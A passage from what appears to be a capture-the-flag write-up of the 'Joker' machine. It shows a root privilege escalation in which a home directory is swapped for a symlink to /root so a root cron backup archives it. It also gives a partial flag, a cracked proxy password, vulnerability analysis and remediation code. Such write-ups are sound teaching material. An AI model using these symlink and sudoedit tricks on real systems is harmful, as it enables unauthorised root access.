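    with tarfile.open(direct, "w") as tar:
        tar.add(link, arcname="development")  # tarfile does not dereference by default
    with tarfile.open(direct) as tar:
        stored_as_symlink = tar.getmember("development").issym()
    return names, stored_as_symlink
```

`demo()` returns `(["root.txt"], True)`. Changing into the symlink archives the target's files, while adding the symlink path directly stores only a link entry.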

I moved the original directory and created the link.

```
alekos@joker:~$ mv development/ development.old
alekos@joker:~$ ln -s /root development
alekos@joker:~$ ls -l
total 24
drwxrwx--- 2 root alekos 12288 Oct 26 00:50 backup
drwxrwxr-x 2 alekos alekos 4096 Oct 26 00:50 development
drwxr-x--- 5 alekos alekos 4096 May 18 2017 development.old
-r--r----- 1 root alekos 33 Oct 25 23:07 user.txt
```

I waited for about five minutes for the cron job to run again and then checked the backup directory for the new file.

```
alekos@joker:~/backup$ ls -l
total 944
...SNIP...
-rw-r----- 1 root alekos 10240 Oct 26 01:00 dev-1761429601.tar.gz
```

I took this new archive and extracted its contents into the /tmp directory to see whether it had worked.

```
alekos@joker:~/backup$ tar xvf dev-1761429601.tar.gz -C /tmp/
backup.sh
root.txt
```

ROOT

The root.txt file was extracted, and I could read the flag.

```
alekos@joker:~/backup$ cat /tmp/root.txt
e5d543f7eb25ce6f....
```

Vulnerability Analysis

1. Unauthenticated TFTP Access (CWE-284)

The TFTP service on UDP port 69 was misconfigured. It allowed any anonymous user to connect and request files from the system without authentication. The service was not restricted to a specific directory (chrooted), which permitted an attacker to traverse the filesystem and download sensitive files, such as /etc/squid/squid.conf and /etc/squid/passwords.

2. Weak Password Storage and Policy (CWE-521)

The system stored user credentials for the Squid proxy using the apr1 (Apache MD5) hashing algorithm. This algorithm is outdated, fast to compute, and susceptible to rapid offline brute-force attacks. The password for the kalamari user was also weak (ihateseafood), which allowed it to be cracked almost immediately using a common wordlist.

3. Exposed Debug Console (CWE-489)

The internal web application, accessible via the proxy, was running with an active Werkzeug debug console. This feature is intended only for development environments and provides an interactive web-based Python shell. Exposing this console, even internally, provides a direct and powerful vector for Remote Code Execution (RCE).

4. Insecure Sudo Configuration (CWE-269 & CWE-59)

The werkzeug user was granted sudo permissions to run sudoedit as the alekos user. This rule was insecure for three reasons:

- Wildcard path: the specified path (`/var/www/*/*/layout.html`) used wildcards, allowing the user to create their own directory structure to match the pattern.
- Symlink following: the `sudoedit_follow` option was enabled, which instructs `sudoedit` to follow symbolic links when opening the file.
- Disabled directory check: `!sudoedit_checkdir` turned off the default check that makes `sudoedit` refuse to edit files in directories writable by the invoking user.

This combination allowed a privilege escalation attack where a symbolic link (layout.html) was created to point to a sensitive file (/home/alekos/.ssh/authorized_keys), which was then overwritten.

5. Insecure Cron Job (CWE-59)

A cron job, running with root privileges, was configured to create a backup archive of the /home/alekos/development directory. This script improperly trusted a directory path that was fully controllable by a lower-privilege user. The script did not check if the development path was a directory or a symbolic link. By replacing the directory with a symlink to /root, the backup script was tricked into archiving the contents of the /root directory.

Vulnerability Remediation

1. TFTP Service

If the TFTP service is not essential, disable it. If it is required, harden it by:

- Running the service from a chrooted directory (`chroot`) to prevent access to the rest of the filesystem.
- Configuring host-based access control (e.g., `iptables` or `/etc/hosts.allow`) to ensure only trusted IP addresses can connect to the service.

2. Password Policy and Storage

- Enforce a strong password complexity policy that prohibits dictionary words, common substitutions, and previously breached passwords.

- Migrate all password storage from MD5 or SHA1-based hashes to a modern, slow, and salted hashing algorithm like Argon2, scrypt, or bcrypt.

3. Application Hardening

- Never deploy applications to a production or staging environment with debug mode enabled. This setting must be explicitly disabled in the application's configuration.

- Implement a default-deny egress firewall policy. The existing rule to block new TCP connections was a good start, but it was too permissive by allowing all UDP. Only allow outgoing connections on specific ports and protocols that are required for the server to function (e.g., UDP/53 for DNS to a trusted resolver).

4. Sudo Configuration

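- Avoid wildcards in `sudoers` rules, especially in paths where low-privilege users have write access. Be as specific as possible.
- Disable symlink following for `sudoedit` by removing `sudoedit_follow` from the `Defaults` line or adding `!sudoedit_follow` to be more explicit.
- Leave `sudoedit_checkdir` at its default (enabled) instead of negating it, so `sudoedit` refuses to edit files in directories the invoking user can write to.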

5. Cron Job Security

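- Scripts running as `root` must never operate directly on user-writable paths.
- Before processing, the script should explicitly check that the target (`/home/alekos/development`) is a directory and not a symbolic link (e.g., using `[ ! -L "$path" ]` in bash). On its own, such a check is racy, because the user can swap the path between the check and its use.
- Don't rely on `tar` flags to fix this. GNU `tar` already stores symlinks as links by default (`-h`/`--dereference` is what makes it follow them). The archive entries carry no `development/` prefix, which suggests the script changes into the directory first, and that follows the link regardless of `tar`'s options. A safer pattern is to have the script copy files into a `root`-owned temporary directory before archiving them.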
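One way to apply the symlink check without a gap between checking and archiving is to open the directory with `O_NOFOLLOW` and then work from that file descriptor. This sketch is in Python rather than the backup script's own language, and the helper names are hypothetical. `O_NOFOLLOW` only protects the last path component, so it assumes the parent directories are not writable by the user.

```python
import os
import tempfile


def open_backup_source(path: str) -> int:
    """Open a directory for archiving, refusing a symlink in the last path component.

    Raises OSError if `path` is a symlink or is not a directory.
    """
    return os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)


def list_backup_source(path: str) -> list[str]:
    fd = open_backup_source(path)
    try:
        return sorted(os.listdir(fd))  # list via the fd, without re-resolving the path
    finally:
        os.close(fd)


def demo():
    base = tempfile.mkdtemp()
    real_dir = os.path.join(base, "development")
    os.mkdir(real_dir)
    open(os.path.join(real_dir, "application.py"), "w").close()
    secret_dir = os.path.join(base, "root")
    os.mkdir(secret_dir)
    link = os.path.join(base, "development-link")
    os.symlink(secret_dir, link)

    names = list_backup_source(real_dir)
    try:
        list_backup_source(link)
        refused = False
    except OSError:
        refused = True
    return names, refused
```

A real script could go one step further and call `os.fchdir(fd)` before running the archiver. The archive would then be built from the exact directory that passed the check.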